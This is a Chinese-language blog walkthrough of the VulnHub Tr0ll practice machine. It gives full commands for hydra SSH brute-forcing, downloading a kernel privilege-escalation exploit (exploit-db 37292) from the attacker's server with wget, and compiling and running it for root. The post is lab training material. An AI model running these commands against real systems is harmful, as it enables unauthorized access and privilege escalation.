全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(一)Tr0ll

开启今天的虚拟机,接下来就是三板斧,先找到目标靶机的IP,然后再用nmap扫描端口,和dirb扫描目录,这两个操作可以同时进行减小时间


通过全端口扫描我们发现目标靶机开放了21,22还有80端口,并且还找到了暴露的robots.txt目录和/secret目录,还有ftb的匿名登录名:Anonymous
根据已有的信息开始攻击,我们直接登录ftb看看能找到什么线索


dir查看当前目录发现有一个叫lol.pcap的文件分析包,将文件下载到本地使用Wireshark打开查看(Wireshark的使用为必要知识,如果不知道的快去百度学一下,虽然我也不太会吧hhh)


然后我在ftb-data协议类型中找到线索——Well, well, well, aren’t you just a clever little devil, you almost found the sup3rs3cr3tdirlol Sucks, you were so close… gotta TRY HARDER!
中文意思:好吧,好吧,你不就是一个聪明的小恶魔吗,你差点发现sup3rs3cr3tdirlol 糟透了,你离得那么近......必须更加努力!
我还以为是让我使用root/sup3rs3cr3tdirlol登陆,试了好几次都失败了,被坑了,换方向,从web端试试


hh,tmd,感觉被耍了,robots.txt目录和secert目录什么有用的信息都没有,这里卡了半天,然后突然想起来上面找到的sup3rs3cr3tdirlol有可能不是密码而是目录,试一下发现果然如此

点击roflmao发现可以下载,拖到kali里面查看文件类型,发现它是一个32位ELF可执行文件


使用strings字符串对其执行一些静态分析,发现Find address 0x0856BF to proceed,意思我们找到了地址0x0856BF


访问之后终于发现了有用的线索,发现有两个文件夹:
good_luck(进入查看包含文件which_one_lol.txt)
this_folder_contains_password(进入查看包含文件pass.txt)


只有一个密码pass.txt,但是有很多个账号,我们把which_one_lol.txt下载到kali用hydra爆破一下
命令: hydra -L which_one_lol.txt -p Pass.txt 192.168.0.145 ssh
注意大小写


登录ssh之后发现靶机正在运行Ubuntu 14.04和3.13内核,看看是否可以找到这些版本的任何特权升级漏洞

二 :提权
https://www.exploit-db.com 上面找到Ubuntu 14.04和3.13内核的可利用提权shell,发现id为37293


在exploit官网查看发现可以使用37292进行提权,先搜索这个漏洞
命令:searchsploit 37293
然后再把37292.c文件保存到桌面的一个空文件夹中
命令:cp /usr/share/exploitdb/exploits/linux/local/37292.c /root/桌面/ssss/


接下来我们就可以使用python搭建一个简易服务器,操纵靶机下载这个文件并执行,我们就可以成功提权了
命令和之前说过的一样,用py3的方法搭建即可
*这里和大家说一个坑,其实这个点我卡了整整一天了,因为我一直以为这个http.server没有开启,因为我每次访问都拒绝连接,而且命令行的省略号让我误以为它一直没有开启,在网上查了很多文章都没有发现原因,然后我先切换到python再输入指令,居然直接无法识别命令了,最后我灵光一闪,是不是因为我是在本机打开这个网页的缘故?然后我到kali自带的游览器打开这个网址127.0.0.1:8979才终于解决这个问题。我想说的主要是大家遇到问题了千万不要放弃,一定要多思考多查资料,找人问是比较低效的方式,因为大部分人不会真正去帮你解决问题,最后只有靠自己,Try harder!!!与君共勉!!


接下来我们需要操纵靶机下载这个文件并执行
首先进入tmp靶机的tmp文件夹,其余的文件夹没有写入权限,然后下载37292.c文件到tmp文件夹
命令:wget http://192.168.0.128:8979/37292.c
需要注意的一点是执行这个命令的时候需要保证网页是开着的,不然它会访问不到从而连接失败


成功下载下来之后就是最后一步啦,解压并执行文件
命令:gcc 37292.c -o duya
./duya


good job,you did it!!!
说实话这个靶机不算难,但是却能比较好的巩固自己的基础知识,期间也遇到了自己不太懂的知识,会做和做的快是有区别的,在渗透这条路上还是任重而道远呐,继续加油。我是渡鸦,每两天更新一台vulnhub靶机,欢迎老爷们关注我一起 提升技术,留言进入vulnhub渗透测试交流群一起进步

若有收获,就点个赞吧

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值